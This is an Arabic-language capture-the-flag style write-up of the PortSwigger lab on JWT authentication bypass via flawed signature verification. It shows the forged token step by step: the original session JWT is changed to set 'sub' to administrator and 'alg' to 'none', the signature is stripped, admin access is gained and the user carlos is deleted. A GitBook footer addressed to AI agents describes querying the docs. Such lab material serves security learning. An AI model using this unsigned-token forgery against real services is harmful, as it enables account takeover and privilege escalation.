> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/web/jwt/jwt-authentication-bypass-via-flawed-signature-verification.md).

# تجاوز مصادقة JWT عبر التحقق المعيب من التوقيع

### تجاوز مصادقة JWT عبر التحقق المعيب من التوقيع

**خلفية المختبر**

يستخدم هذا المختبر **رموز ويب JSON (JWT)** لإدارة جلسات المستخدمين. / إعدادات الخادم غير صحيحة: فهو \*\* يقبل JWT غير موقَّع\*\*، مما يسمح بتزوير رمز صالح دون امتلاك المفتاح الخاص.

**الهدف:**

* عدّل JWT الخاص بالجلسة للوصول `/admin` لوحة الإدارة
* حذف المستخدم **carlos**

**بيانات الاعتماد المقدَّمة:**

* المستخدم: `wiener`
* كلمة المرور: `peter`

\*\* التحليل الأولي لـ JWT\*\*

بعد تسجيل الدخول، يتم توفير ملف تعريف ارتباط للجلسة JWT:

```bash
eyJraWQiOiJhZTJhMTg3MS05MDJkLTQ2YTctYWFiOC1mOTU1OGJiMGU2NGUiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc2NzUzMTU3Niwic3ViIjoid2llbmVyIn0.CDQZmT-cC5Oa1A4yVjgEu1HVYC_J7aZ_Utfjkbdy8D0frSJVeZygaS82Frj4ZI6q8a0XGgvDE1NEJ1TQdnrJ2WSFRWoew7Nen9FJe1X_Rz2nHVKCA5kk30Kx2xB9BQ6ij-wbQLLcZkPV4CqklQ51CwPwrxCfPzpGXxCGOhjOvfYTeZzmKrskOzTG1Ikk3rv4JGWY1GKATeRXuZgbIUxG4QsHS7bDOzcUCuhUiUj4uu4gWE2FvZFLpnbNC1VvtUyq37Qqrqo78IomtnA3pe6e285IzkIr8IK-iiLVvkV4q2pTDI4-FIaMsaqMvyLvBWqsHMR-OXL4MJZMQho0E1Cdtw
```

* **الرأس**: `RS256` الخوارزمية
* **الحمولة**: `wiener` المستخدم
* **التوقيع**: أصلي وصالح

**تعديل الحمولة**

الهدف هو التظاهر بأنك مسؤول. / الـ `sub` يتم تعديل الحقل في الحمولة:

```json
{
  "iss": "portswigger",
  "exp": 1767531576,
  "sub": "administrator"
}
```

<figure><img src="/files/8ed614bd5693fe67bbfdbe56e784511c7df9a741" alt=""><figcaption></figcaption></figure>

**استغلال التحقق غير الصحيح**

يقبل الخادم JWT مع `none` الخوارزمية. / الـ **الترويسة** يتم بعد ذلك تعديلها:

```json
{
  "kid": "ae2a1871-902d-46a7-aab8-f9558bb0e64e",
  "alg": "none"
}
```

<figure><img src="/files/17ec76c386801bbed378c1da9cd1274d7220db2b" alt=""><figcaption></figcaption></figure>

التالي:

* يتم حذف التوقيع بالكامل\*\*
* ينتهي JWT النهائي بنقطة واحدة (`.`)

{% code overflow="wrap" %}

```bash
eyJraWQiOiJhZTJhMTg3MS05MDJkLTQ2YTctYWFiOC1mOTU1OGJiMGU2NGUiLCJhbGciOiJub25lIn0%3d.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc2NzUzMjI2NSwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.
```

{% endcode %}

**النتيجة**

* يقبل الخادم \*\* JWT غير موقّع\*\*
* الوصول إلى `/admin` يُسمح بالوصول إلى اللوحة
* المستخدم **carlos** قد يتم حذفه

<figure><img src="/files/14b9944aa9ceb6163073ec132578243c3880e9f4" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/web/jwt/jwt-authentication-bypass-via-flawed-signature-verification.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
